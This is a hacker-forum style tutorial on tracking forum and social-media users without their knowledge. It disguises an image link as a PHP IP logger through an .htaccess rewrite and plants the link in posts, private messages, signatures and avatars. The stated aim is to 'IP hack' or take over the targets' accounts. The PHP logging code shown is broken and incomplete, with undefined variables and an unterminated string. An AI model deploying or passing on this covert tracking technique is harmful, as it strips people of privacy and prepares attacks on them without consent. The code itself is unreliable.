With an IP address you can hotmail revert them or try to IP hack them using a program
Basically this
tutorial is to grab the IP of a user it may also be done by simply
asking the user lol he/she surely wont tell you!
However, After extensive research Tech-Attacks found out the solution and would like to share with you all.
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Step 1.)
Find a free webhost you can use.
(The one I use is FreeHostia.com)
Step 2.)
Make a new web directory
example: http://site.com/directory/
Step 3.)
Create a new file named:
Step 4.)
Put this code in .htaccess
RewriteEngine on
RewriteRule ^image.gif$ iplogger.php
Where it says: image.gif
You can change
it to where you`ve uploaded your image, it doesn`t matter what image and
it can be in any image type such as: gif, jpeg, png, etc.
Where it says: iplogger.php
That is the PHP file that will have the Ip logging code, whatever you want to name it.
Step 5
Create an empty iplogger.php file (or whatever you named it)
And put in this code:
$log = 'logger.html';
$page = $_SERVER['REQUEST_URI'];
$refer = $_SERVER['HTTP_REFERER'];
$date_time = date("l j F Y g:ia", time() - date("Z")) ;
$fp = fopen("logger.html", "a");
fputs($fp, "
<br> <b>IP: </b>$ip<br><b>Page:
</b>$agent <br><br>
flock($fp, 3);
Then create an Empty:
logger.html file
Step 6.)
Upload your image.gif file (or whatever you named it)
if you haven't already
Step 7.)
Go to a forum,Blog,social networking site or wherever you would like
And insert the image using:
You can insert this in:
- Pm`s
- Posts & Threads
- Signatures
- Avatars
- And anything else that allows external linking of images.
If you would like to insert your image using HTML where is allowed then use this.
<IMG SRC="http://site.com/directory/image.gif">
Step 8.)
Check your: http://site.com/directory/logger.html
For all your IP logs including where they came from.
How it WORKS:
When the web tries to access the Image that is in the directory with the .htaccess file.
The image.gif displays iplogger.php
Because you told it to do so.
It is called mod_rewriting and is very useful.
This tricks the forum or whatever site your using it on to display the re-written url.
If you would
like to display an image at the same time while logging their ip, then
you can by inserting the img src code into the php file.
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